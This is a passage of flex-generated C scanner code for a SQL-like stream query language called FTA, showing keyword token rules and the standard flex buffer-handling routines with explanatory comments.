{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("SUM"); return AGGR; }
YY_BREAK
case 9:
YY_RULE_SETUP
#line 130 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("COUNT"); return AGGR; }
YY_BREAK
case 10:
YY_RULE_SETUP
#line 131 "fta.l"
{ flex_fta_ch+=FtaParserleng; return BY; }
YY_BREAK
case 11:
YY_RULE_SETUP
#line 132 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FROM; }
YY_BREAK
case 12:
YY_RULE_SETUP
#line 133 "fta.l"
{ flex_fta_ch+=FtaParserleng; return INNER_JOIN; }
YY_BREAK
case 13:
YY_RULE_SETUP
#line 134 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OUTER_JOIN; }
YY_BREAK
case 14:
YY_RULE_SETUP
#line 135 "fta.l"
{ flex_fta_ch+=FtaParserleng; return RIGHT_OUTER_JOIN; }
YY_BREAK
case 15:
YY_RULE_SETUP
#line 136 "fta.l"
{ flex_fta_ch+=FtaParserleng; return LEFT_OUTER_JOIN; }
YY_BREAK
case 16:
YY_RULE_SETUP
#line 137 "fta.l"
{ flex_fta_ch+=FtaParserleng; return WATCHLIST_JOIN; }
YY_BREAK
case 17:
YY_RULE_SETUP
#line 138 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FILTER_JOIN; }
YY_BREAK
case 18:
YY_RULE_SETUP
#line 139 "fta.l"
{ flex_fta_ch+=FtaParserleng; return GROUP; }
YY_BREAK
case 19:
YY_RULE_SETUP
#line 140 "fta.l"
{ flex_fta_ch+=FtaParserleng; return ROLLUP; }
YY_BREAK
case 20:
YY_RULE_SETUP
#line 141 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CUBE; }
YY_BREAK
case 21:
YY_RULE_SETUP
#line 142 "fta.l"
{ flex_fta_ch+=FtaParserleng; return GROUPING_SETS; }
YY_BREAK
case 22:
YY_RULE_SETUP
#line 143 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SUPERGROUP; }
YY_BREAK
case 23:
YY_RULE_SETUP
#line 144 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CLEANING_WHEN; }
YY_BREAK
case 24:
YY_RULE_SETUP
#line 145 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CLEANING_BY; }
YY_BREAK
case 25:
YY_RULE_SETUP
#line 146 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CLOSING_WHEN; }
YY_BREAK
case 26:
YY_RULE_SETUP
#line 147 "fta.l"
{ flex_fta_ch+=FtaParserleng; return HAVING; }
YY_BREAK
case 27:
YY_RULE_SETUP
#line 148 "fta.l"
{ flex_fta_ch+=FtaParserleng; return AS; }
YY_BREAK
case 28:
YY_RULE_SETUP
#line 149 "fta.l"
{ flex_fta_ch+=FtaParserleng; return IN; }
YY_BREAK
case 29:
YY_RULE_SETUP
#line 150 "fta.l"
{ flex_fta_ch+=FtaParserleng; return NOT; }
YY_BREAK
case 30:
YY_RULE_SETUP
#line 151 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OR; }
YY_BREAK
case 31:
YY_RULE_SETUP
#line 153 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SELECT; }
YY_BREAK
case 32:
YY_RULE_SETUP
#line 154 "fta.l"
{ flex_fta_ch+=FtaParserleng; return WHERE; }
YY_BREAK
case 33:
YY_RULE_SETUP
#line 155 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SUCH;}
YY_BREAK
case 34:
YY_RULE_SETUP
#line 156 "fta.l"
{ flex_fta_ch+=FtaParserleng; return THAT;}
YY_BREAK
case 35:
YY_RULE_SETUP
#line 157 "fta.l"
{flex_fta_ch+=FtaParserleng; return MERGE;}
YY_BREAK
case 36:
YY_RULE_SETUP
#line 158 "fta.l"
{flex_fta_ch+=FtaParserleng; return SLACK;}
YY_BREAK
case 37:
YY_RULE_SETUP
#line 159 "fta.l"
{flex_fta_ch+=FtaParserleng; return WATCHLIST;}
YY_BREAK
case 38:
YY_RULE_SETUP
#line 161 "fta.l"
{ flex_fta_ch+=FtaParserleng; return TRUE_V;}
YY_BREAK
case 39:
YY_RULE_SETUP
#line 162 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FALSE_V;}
YY_BREAK
case 40:
YY_RULE_SETUP
#line 163 "fta.l"
{ flex_fta_ch+=FtaParserleng; return TIMEVAL_L;}
YY_BREAK
case 41:
YY_RULE_SETUP
#line 164 "fta.l"
{ flex_fta_ch+=FtaParserleng; return HEX_L;}
YY_BREAK
case 42:
YY_RULE_SETUP
#line 165 "fta.l"
{ flex_fta_ch+=FtaParserleng; return LHEX_L;}
YY_BREAK
case 43:
YY_RULE_SETUP
#line 166 "fta.l"
{ flex_fta_ch+=FtaParserleng; return IP_L;}
YY_BREAK
case 44:
YY_RULE_SETUP
#line 167 "fta.l"
{ flex_fta_ch+=FtaParserleng; return IPV6_L;}
YY_BREAK
case 45:
YY_RULE_SETUP
#line 169 "fta.l"
{ flex_fta_ch+=FtaParserleng; return DEFINE_SEC;}
YY_BREAK
case 46:
YY_RULE_SETUP
#line 170 "fta.l"
{ flex_fta_ch+=FtaParserleng; return PARAM_SEC;}
YY_BREAK
case 47:
YY_RULE_SETUP
#line 172 "fta.l"
{flex_fta_ch+=FtaParserleng; return LEFTBRACE;}
YY_BREAK
case 48:
YY_RULE_SETUP
#line 173 "fta.l"
{flex_fta_ch+=FtaParserleng; return RIGHTBRACE;}
YY_BREAK
/*
Table definition keywords
*/
case 49:
YY_RULE_SETUP
#line 178 "fta.l"
{ flex_fta_ch+=FtaParserleng; return TABLE; }
YY_BREAK
case 50:
YY_RULE_SETUP
#line 179 "fta.l"
{ flex_fta_ch+=FtaParserleng; return PROTOCOL; }
YY_BREAK
case 51:
YY_RULE_SETUP
#line 180 "fta.l"
{ flex_fta_ch+=FtaParserleng; return STREAM; }
YY_BREAK
case 52:
YY_RULE_SETUP
#line 181 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FTA; }
YY_BREAK
case 53:
YY_RULE_SETUP
#line 182 "fta.l"
{ flex_fta_ch+=FtaParserleng; return UNPACK_FCNS; }
YY_BREAK
case 54:
YY_RULE_SETUP
#line 184 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OPERATOR; }
YY_BREAK
case 55:
YY_RULE_SETUP
#line 185 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OPERATOR_VIEW; }
YY_BREAK
case 56:
YY_RULE_SETUP
#line 186 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FIELDS; }
YY_BREAK
case 57:
YY_RULE_SETUP
#line 187 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SUBQUERIES; }
YY_BREAK
case 58:
YY_RULE_SETUP
#line 188 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SELECTION_PUSHDOWN; }
YY_BREAK
case 59:
YY_RULE_SETUP
#line 189 "fta.l"
{flex_fta_ch+=FtaParserleng; return SEMICOLON;}
YY_BREAK
/* punctuation */
case 60:
#line 194 "fta.l"
case 61:
YY_RULE_SETUP
#line 194 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return SHIFT_OP; }
YY_BREAK
case 62:
#line 197 "fta.l"
case 63:
#line 198 "fta.l"
case 64:
#line 199 "fta.l"
case 65:
#line 200 "fta.l"
case 66:
#line 201 "fta.l"
case 67:
YY_RULE_SETUP
#line 201 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return COMPARISON; }
YY_BREAK
case 68:
YY_RULE_SETUP
#line 203 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FtaParsertext[0]; }
YY_BREAK
case 69:
YY_RULE_SETUP
#line 204 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FtaParsertext[0]; }
YY_BREAK
case 70:
YY_RULE_SETUP
#line 205 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FtaParsertext[0]; }
YY_BREAK
/* names */
case 71:
YY_RULE_SETUP
#line 209 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return NAME; }
YY_BREAK
/* numbers */
case 72:
#line 214 "fta.l"
case 73:
YY_RULE_SETUP
#line 214 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return INTNUM; }
YY_BREAK
case 74:
YY_RULE_SETUP
#line 216 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return LONGINTNUM; }
YY_BREAK
case 75:
#line 219 "fta.l"
case 76:
#line 220 "fta.l"
case 77:
#line 221 "fta.l"
case 78:
#line 222 "fta.l"
case 79:
YY_RULE_SETUP
#line 222 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return APPROXNUM; }
YY_BREAK
/* strings */
case 80:
YY_RULE_SETUP
#line 226 "fta.l"
{
int c;
FtaParserlval.strval = strdup(FtaParsertext+1);
c = yyinput();
unput(c); /* just peeking */
if(c != '\'') {
flex_fta_ch+=FtaParserleng;
FtaParserlval.strval[FtaParserleng-2] = '\0';
return STRING_TOKEN;
} else
yymore();
}
YY_BREAK
case 81:
*yy_cp = (yy_hold_char); /* undo effects of setting up FtaParsertext */
(yy_c_buf_p) = yy_cp -= 1;
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */
YY_RULE_SETUP
#line 243 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParsererror("Unterminated string"); }
YY_BREAK
/* */
/* Newline : advance the error reporting line number */
/* and grab the next line into flex_fta_linebuf */
/* */
case 82:
/* rule 82 can match eol */
YY_RULE_SETUP
#line 250 "fta.l"
{flex_fta_ch=0; flex_fta_lineno++;
strcpy(flex_fta_linebuf,FtaParsertext+1);
yyless(1);
}
YY_BREAK
case 83:
YY_RULE_SETUP
#line 255 "fta.l"
{flex_fta_ch+=FtaParserleng; } /* white space */
YY_BREAK
case 84:
*yy_cp = (yy_hold_char); /* undo effects of setting up FtaParsertext */
(yy_c_buf_p) = yy_cp -= 1;
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */
YY_RULE_SETUP
#line 257 "fta.l"
{flex_fta_ch+=FtaParserleng; }; /* comment */
YY_BREAK
case 85:
*yy_cp = (yy_hold_char); /* undo effects of setting up FtaParsertext */
(yy_c_buf_p) = yy_cp -= 1;
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */
YY_RULE_SETUP
#line 258 "fta.l"
{flex_fta_ch+=FtaParserleng; }; /* comment */
YY_BREAK
case 86:
/* rule 86 can match eol */
YY_RULE_SETUP
#line 260 "fta.l"
{flex_fta_ch+=FtaParserleng; fprintf(stderr,"Warning: unknown token (ignored)\n"); FtaParsererror(FtaParsertext);}
YY_BREAK
case 87:
YY_RULE_SETUP
#line 262 "fta.l"
ECHO;
YY_BREAK
#line 1755 "ftalexer.cc"
case YY_STATE_EOF(INITIAL):
yyterminate();
case YY_END_OF_BUFFER:
{
/* Amount of text matched not including the EOB char. */
int yy_amount_of_matched_text = (int) (yy_cp - (yytext_ptr)) - 1;
/* Undo the effects of YY_DO_BEFORE_ACTION. */
*yy_cp = (yy_hold_char);
YY_RESTORE_YY_MORE_OFFSET
if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_NEW )
{
/* We're scanning a new file or input source. It's
* possible that this happened because the user
* just pointed FtaParserin at a new source and called
* FtaParserlex(). If so, then we have to assure
* consistency between YY_CURRENT_BUFFER and our
* globals. Here is the right place to do so, because
* this is the first action (other than possibly a
* back-up) that will match for the new input source.
*/
(yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars;
YY_CURRENT_BUFFER_LVALUE->yy_input_file = FtaParserin;
YY_CURRENT_BUFFER_LVALUE->yy_buffer_status = YY_BUFFER_NORMAL;
}
/* Note that here we test for yy_c_buf_p "<=" to the position
* of the first EOB in the buffer, since yy_c_buf_p will
* already have been incremented past the NUL character
* (since all states make transitions on EOB to the
* end-of-buffer state). Contrast this with the test
* in input().
*/
if ( (yy_c_buf_p) <= &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] )
{ /* This was really a NUL. */
yy_state_type yy_next_state;
(yy_c_buf_p) = (yytext_ptr) + yy_amount_of_matched_text;
yy_current_state = yy_get_previous_state( );
/* Okay, we're now positioned to make the NUL
* transition. We couldn't have
* yy_get_previous_state() go ahead and do it
* for us because it doesn't know how to deal
* with the possibility of jamming (and we don't
* want to build jamming into it because then it
* will run more slowly).
*/
yy_next_state = yy_try_NUL_trans( yy_current_state );
yy_bp = (yytext_ptr) + YY_MORE_ADJ;
if ( yy_next_state )
{
/* Consume the NUL. */
yy_cp = ++(yy_c_buf_p);
yy_current_state = yy_next_state;
goto yy_match;
}
else
{
yy_cp = (yy_c_buf_p);
goto yy_find_action;
}
}
else switch ( yy_get_next_buffer( ) )
{
case EOB_ACT_END_OF_FILE:
{
(yy_did_buffer_switch_on_eof) = 0;
if ( FtaParserwrap( ) )
{
/* Note: because we've taken care in
* yy_get_next_buffer() to have set up
* FtaParsertext, we can now set up
* yy_c_buf_p so that if some total
* hoser (like flex itself) wants to
* call the scanner after we return the
* YY_NULL, it'll still work - another
* YY_NULL will get returned.
*/
(yy_c_buf_p) = (yytext_ptr) + YY_MORE_ADJ;
yy_act = YY_STATE_EOF(YY_START);
goto do_action;
}
else
{
if ( ! (yy_did_buffer_switch_on_eof) )
YY_NEW_FILE;
}
break;
}
case EOB_ACT_CONTINUE_SCAN:
(yy_c_buf_p) =
(yytext_ptr) + yy_amount_of_matched_text;
yy_current_state = yy_get_previous_state( );
yy_cp = (yy_c_buf_p);
yy_bp = (yytext_ptr) + YY_MORE_ADJ;
goto yy_match;
case EOB_ACT_LAST_MATCH:
(yy_c_buf_p) =
&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)];
yy_current_state = yy_get_previous_state( );
yy_cp = (yy_c_buf_p);
yy_bp = (yytext_ptr) + YY_MORE_ADJ;
goto yy_find_action;
}
break;
}
default:
YY_FATAL_ERROR(
"fatal flex scanner internal error--no action found" );
} /* end of action switch */
} /* end of scanning one token */
} /* end of user's declarations */
} /* end of FtaParserlex */
/* yy_get_next_buffer - try to read in a new buffer
*
* Returns a code representing an action:
* EOB_ACT_LAST_MATCH -
* EOB_ACT_CONTINUE_SCAN - continue scanning from current position
* EOB_ACT_END_OF_FILE - end of file
*/
static int yy_get_next_buffer (void)
{
	/* Refill the scan buffer after the end-of-buffer sentinel is hit:
	 * shift any partially-matched token to the front of the buffer,
	 * grow the buffer if that token fills it, then pull more bytes in
	 * through YY_INPUT. Returns one of the EOB_ACT_* codes. */
	char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf;
	char *source = (yytext_ptr);
	yy_size_t number_to_move, i;
	int ret_val;

	if ( (yy_c_buf_p) > &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] )
		YY_FATAL_ERROR(
		"fatal flex scanner internal error--end of buffer missed" );

	if ( YY_CURRENT_BUFFER_LVALUE->yy_fill_buffer == 0 )
		{ /* Don't try to fill the buffer, so this is an EOF. */
		if ( (yy_c_buf_p) - (yytext_ptr) - YY_MORE_ADJ == 1 )
			{
			/* We matched a single character, the EOB, so
			 * treat this as a final EOF.
			 */
			return EOB_ACT_END_OF_FILE;
			}
		else
			{
			/* We matched some text prior to the EOB, first
			 * process it.
			 */
			return EOB_ACT_LAST_MATCH;
			}
		}

	/* Try to read more data. */

	/* First move last chars to start of buffer. */
	number_to_move = (yy_size_t) ((yy_c_buf_p) - (yytext_ptr)) - 1;

	for ( i = 0; i < number_to_move; ++i )
		*(dest++) = *(source++);

	if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_EOF_PENDING )
		/* don't do the read, it's not guaranteed to return an EOF,
		 * just force an EOF
		 */
		YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars) = 0;
	else
		{
			yy_size_t num_to_read =
			YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1;

		while ( num_to_read <= 0 )
			{ /* Not enough room in the buffer - grow it. */

			/* just a shorter name for the current buffer */
			YY_BUFFER_STATE b = YY_CURRENT_BUFFER_LVALUE;

			int yy_c_buf_p_offset =
				(int) ((yy_c_buf_p) - b->yy_ch_buf);

			if ( b->yy_is_our_buffer )
				{
				yy_size_t new_size = b->yy_buf_size * 2;

				/* new_size <= 0 means the doubling overflowed:
				 * fall back to growing by 1/8th. */
				if ( new_size <= 0 )
					b->yy_buf_size += b->yy_buf_size / 8;
				else
					b->yy_buf_size *= 2;

				b->yy_ch_buf = (char *)
					/* Include room in for 2 EOB chars. */
					FtaParserrealloc((void *) b->yy_ch_buf,b->yy_buf_size + 2 );
				}
			else
				/* Can't grow it, we don't own it. */
				b->yy_ch_buf = 0;

			if ( ! b->yy_ch_buf )
				YY_FATAL_ERROR(
				"fatal error - scanner input buffer overflow" );

			/* Re-anchor the scan pointer: realloc may have moved the buffer. */
			(yy_c_buf_p) = &b->yy_ch_buf[yy_c_buf_p_offset];

			num_to_read = YY_CURRENT_BUFFER_LVALUE->yy_buf_size -
						number_to_move - 1;
			}

		if ( num_to_read > YY_READ_BUF_SIZE )
			num_to_read = YY_READ_BUF_SIZE;

		/* Read in more data. */
		YY_INPUT( (&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move]),
			(yy_n_chars), num_to_read );

		YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars);
		}

	if ( (yy_n_chars) == 0 )
		{
		if ( number_to_move == YY_MORE_ADJ )
			{
			/* Nothing pending and nothing read: true EOF. */
			ret_val = EOB_ACT_END_OF_FILE;
			FtaParserrestart(FtaParserin );
			}
		else
			{
			/* There is leftover matched text to process first. */
			ret_val = EOB_ACT_LAST_MATCH;
			YY_CURRENT_BUFFER_LVALUE->yy_buffer_status =
				YY_BUFFER_EOF_PENDING;
			}
		}
	else
		ret_val = EOB_ACT_CONTINUE_SCAN;

	if ((int) ((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) {
		/* Extend the array by 50%, plus the number we really need. */
		int new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1);
		YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) FtaParserrealloc((void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf,new_size );
		if ( ! YY_CURRENT_BUFFER_LVALUE->yy_ch_buf )
			YY_FATAL_ERROR( "out of dynamic memory in yy_get_next_buffer()" );
	}

	(yy_n_chars) += number_to_move;
	/* Re-plant the two end-of-buffer sentinel characters. */
	YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] = YY_END_OF_BUFFER_CHAR;
	YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] = YY_END_OF_BUFFER_CHAR;

	(yytext_ptr) = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[0];

	return ret_val;
}
/* yy_get_previous_state - get the state just before the EOB char was reached */
/* yy_get_previous_state - get the state just before the EOB char was reached.
 * Replays the DFA over the text matched so far so scanning can resume
 * correctly after a buffer refill or an embedded NUL. */
    static yy_state_type yy_get_previous_state (void)
{
	yy_state_type yy_current_state;
	char *yy_cp;

	yy_current_state = (yy_start);

	for ( yy_cp = (yytext_ptr) + YY_MORE_ADJ; yy_cp < (yy_c_buf_p); ++yy_cp )
		{
		/* NUL bytes are fed to the DFA as equivalence class 1,
		 * bypassing the yy_ec mapping table. */
		YY_CHAR yy_c = (*yy_cp ? yy_ec[YY_SC_TO_UI(*yy_cp)] : 1);
		if ( yy_accept[yy_current_state] )
			{
			/* Record the most recent accepting state/position so the
			 * main loop can back up to it if a longer match fails. */
			(yy_last_accepting_state) = yy_current_state;
			(yy_last_accepting_cpos) = yy_cp;
			}
		/* Follow default transitions until the compressed table row
		 * actually belongs to the current state. */
		while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state )
			{
			yy_current_state = (int) yy_def[yy_current_state];
			if ( yy_current_state >= 692 )
				yy_c = yy_meta[(unsigned int) yy_c];
			}
		yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c];
		}

	return yy_current_state;
}
/* yy_try_NUL_trans - try to make a transition on the NUL character
*
* synopsis
* next_state = yy_try_NUL_trans( current_state );
*/
    static yy_state_type yy_try_NUL_trans  (yy_state_type yy_current_state )
{
	int yy_is_jam;
	char *yy_cp = (yy_c_buf_p);

	/* A NUL character is represented by equivalence class 1. */
	YY_CHAR yy_c = 1;
	if ( yy_accept[yy_current_state] )
		{
		/* Remember the accepting state/position for backup. */
		(yy_last_accepting_state) = yy_current_state;
		(yy_last_accepting_cpos) = yy_cp;
		}
	while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state )
		{
		yy_current_state = (int) yy_def[yy_current_state];
		if ( yy_current_state >= 692 )
			yy_c = yy_meta[(unsigned int) yy_c];
		}
	yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c];

	/* State 691 is this scanner's generated jam (dead) state. */
	yy_is_jam = (yy_current_state == 691);

	/* Return 0 when there is no transition on NUL, else the next state. */
	return yy_is_jam ? 0 : yy_current_state;
}
#ifndef YY_NO_UNPUT
/* Push character c back onto the input stream just before yy_bp.
 * If the read pointer is already at the front of the buffer, the whole
 * buffer contents are shifted toward the end to make room. */
    static void yyunput (int c, char * yy_bp )
{
	char *yy_cp;

    yy_cp = (yy_c_buf_p);

	/* undo effects of setting up FtaParsertext */
	*yy_cp = (yy_hold_char);

	if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 )
		{ /* need to shift things up to make room */
		/* +2 for EOB chars. */
		yy_size_t number_to_move = (yy_n_chars) + 2;
		char *dest = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[
					YY_CURRENT_BUFFER_LVALUE->yy_buf_size + 2];
		char *source =
				&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move];

		/* Copy backwards so overlapping ranges are handled. */
		while ( source > YY_CURRENT_BUFFER_LVALUE->yy_ch_buf )
			*--dest = *--source;

		yy_cp += (int) (dest - source);
		yy_bp += (int) (dest - source);
		YY_CURRENT_BUFFER_LVALUE->yy_n_chars =
			(yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_buf_size;

		if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 )
			YY_FATAL_ERROR( "flex scanner push-back overflow" );
		}

	/* Store the pushed-back character and rewind the scan pointers. */
	*--yy_cp = (char) c;

	(yytext_ptr) = yy_bp;
	(yy_hold_char) = *yy_cp;
	(yy_c_buf_p) = yy_cp;
}
#endif
#ifndef YY_NO_INPUT
#ifdef __cplusplus
    static int yyinput (void)
#else
    static int input  (void)
#endif
{
	/* Return the next character of input (as used by the rule for
	 * quoted strings to peek ahead), refilling the buffer on demand.
	 * Returns EOF at true end of input. */
	int c;

	*(yy_c_buf_p) = (yy_hold_char);

	if ( *(yy_c_buf_p) == YY_END_OF_BUFFER_CHAR )
		{
		/* yy_c_buf_p now points to the character we want to return.
		 * If this occurs *before* the EOB characters, then it's a
		 * valid NUL; if not, then we've hit the end of the buffer.
		 */
		if ( (yy_c_buf_p) < &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] )
			/* This was really a NUL. */
			*(yy_c_buf_p) = '\0';
		else
			{ /* need more input */
			/* Remember how far into the token we are; the refill may
			 * move the buffer contents. */
			yy_size_t offset = (yy_c_buf_p) - (yytext_ptr);
			++(yy_c_buf_p);

			switch ( yy_get_next_buffer(  ) )
				{
				case EOB_ACT_LAST_MATCH:
					/* This happens because yy_g_n_b()
					 * sees that we've accumulated a
					 * token and flags that we need to
					 * try matching the token before
					 * proceeding.  But for input(),
					 * there's no matching to consider.
					 * So convert the EOB_ACT_LAST_MATCH
					 * to EOB_ACT_END_OF_FILE.
					 */

					/* Reset buffer status. */
					FtaParserrestart(FtaParserin );

					/*FALLTHROUGH*/

				case EOB_ACT_END_OF_FILE:
					{
					if ( FtaParserwrap( ) )
						return EOF;

					if ( ! (yy_did_buffer_switch_on_eof) )
						YY_NEW_FILE;
#ifdef __cplusplus
					return yyinput();
#else
					return input();
#endif
					}

				case EOB_ACT_CONTINUE_SCAN:
					(yy_c_buf_p) = (yytext_ptr) + offset;
					break;
				}
			}
		}

	c = *(unsigned char *) (yy_c_buf_p);	/* cast for 8-bit char's */
	*(yy_c_buf_p) = '\0';	/* preserve FtaParsertext */
	(yy_hold_char) = *++(yy_c_buf_p);

	return c;
}
#endif /* ifndef YY_NO_INPUT */
/** Immediately switch to a different input stream.
* @param input_file A readable stream.
*
* @note This function does not reset the start condition to @c INITIAL .
*/
    void FtaParserrestart  (FILE * input_file )
{
	/* Lazily create the buffer stack and a default-sized buffer the
	 * first time the scanner is (re)started. */
	if ( ! YY_CURRENT_BUFFER ){
        FtaParserensure_buffer_stack ();
		YY_CURRENT_BUFFER_LVALUE =
            FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE );
	}

	/* Reset the current buffer to read from input_file and reload the
	 * scanner globals from it. */
	FtaParser_init_buffer(YY_CURRENT_BUFFER,input_file );
	FtaParser_load_buffer_state( );
}
/** Switch to a different input buffer.
* @param new_buffer The new input buffer.
*
*/
    void FtaParser_switch_to_buffer  (YY_BUFFER_STATE new_buffer )
{
	/* Save the current buffer's position bookkeeping, then make
	 * new_buffer the active scan buffer. No-op if already active. */

	/* TODO. We should be able to replace this entire function body
	 * with
	 *		FtaParserpop_buffer_state();
	 *		FtaParserpush_buffer_state(new_buffer);
     */
	FtaParserensure_buffer_stack ();
	if ( YY_CURRENT_BUFFER == new_buffer )
		return;

	if ( YY_CURRENT_BUFFER )
		{
		/* Flush out information for old buffer. */
		*(yy_c_buf_p) = (yy_hold_char);
		YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p);
		YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars);
		}

	YY_CURRENT_BUFFER_LVALUE = new_buffer;
	FtaParser_load_buffer_state( );

	/* We don't actually know whether we did this switch during
	 * EOF (FtaParserwrap()) processing, but the only time this flag
	 * is looked at is after FtaParserwrap() is called, so it's safe
	 * to go ahead and always set it.
	 */
	(yy_did_buffer_switch_on_eof) = 1;
}
static void FtaParser_load_buffer_state  (void)
{
	/* Copy the active buffer's bookkeeping into the scanner globals
	 * (char count, text/scan pointers, input stream, held char). */
    	(yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars;
	(yytext_ptr) = (yy_c_buf_p) = YY_CURRENT_BUFFER_LVALUE->yy_buf_pos;
	FtaParserin = YY_CURRENT_BUFFER_LVALUE->yy_input_file;
	(yy_hold_char) = *(yy_c_buf_p);
}
/** Allocate and initialize an input buffer state.
* @param file A readable stream.
* @param size The character buffer size in bytes. When in doubt, use @c YY_BUF_SIZE.
*
* @return the allocated buffer state.
*/
    YY_BUFFER_STATE FtaParser_create_buffer  (FILE * file, int  size )
{
	YY_BUFFER_STATE b;

	/* Allocate the buffer-state struct, then its character buffer. */
	b = (YY_BUFFER_STATE) FtaParseralloc(sizeof( struct yy_buffer_state )  );
	if ( ! b )
		YY_FATAL_ERROR( "out of dynamic memory in FtaParser_create_buffer()" );

	b->yy_buf_size = (yy_size_t)size;

	/* yy_ch_buf has to be 2 characters longer than the size given because
	 * we need to put in 2 end-of-buffer characters.
	 */
	b->yy_ch_buf = (char *) FtaParseralloc(b->yy_buf_size + 2  );
	if ( ! b->yy_ch_buf )
		YY_FATAL_ERROR( "out of dynamic memory in FtaParser_create_buffer()" );

	/* We own this buffer, so yy_get_next_buffer may realloc it. */
	b->yy_is_our_buffer = 1;

	FtaParser_init_buffer(b,file );

	return b;
}
/** Destroy the buffer.
* @param b a buffer created with FtaParser_create_buffer()
*
*/
    void FtaParser_delete_buffer (YY_BUFFER_STATE b )
{
	if ( ! b )
		return;

	/* Detach first if b is the active buffer. */
	if ( b == YY_CURRENT_BUFFER ) /* Not sure if we should pop here. */
		YY_CURRENT_BUFFER_LVALUE = (YY_BUFFER_STATE) 0;

	/* Only free the character buffer if this scanner allocated it
	 * (user-supplied buffers from FtaParser_scan_buffer are not ours). */
	if ( b->yy_is_our_buffer )
		FtaParserfree((void *) b->yy_ch_buf );

	FtaParserfree((void *) b );
}
/* Initializes or reinitializes a buffer.
* This function is sometimes called more than once on the same buffer,
* such as during a FtaParserrestart() or at EOF.
*/
    static void FtaParser_init_buffer  (YY_BUFFER_STATE b, FILE * file )

{
	int oerrno = errno;	/* isatty()/fileno() may clobber errno; restore it below */

	FtaParser_flush_buffer(b );

	b->yy_input_file = file;
	b->yy_fill_buffer = 1;

    /* If b is the current buffer, then FtaParser_init_buffer was _probably_
     * called from FtaParserrestart() or through yy_get_next_buffer.
     * In that case, we don't want to reset the lineno or column.
     */
    if (b != YY_CURRENT_BUFFER){
        b->yy_bs_lineno = 1;
        b->yy_bs_column = 0;
    }

	/* Interactive buffers are read one char at a time by YY_INPUT. */
        b->yy_is_interactive = file ? (isatty( fileno(file) ) > 0) : 0;

	errno = oerrno;
}
/** Discard all buffered characters. On the next scan, YY_INPUT will be called.
* @param b the buffer state to be flushed, usually @c YY_CURRENT_BUFFER.
*
*/
    void FtaParser_flush_buffer (YY_BUFFER_STATE b )
{
    	if ( ! b )
		return;

	b->yy_n_chars = 0;

	/* We always need two end-of-buffer characters.  The first causes
	 * a transition to the end-of-buffer state.  The second causes
	 * a jam in that state.
	 */
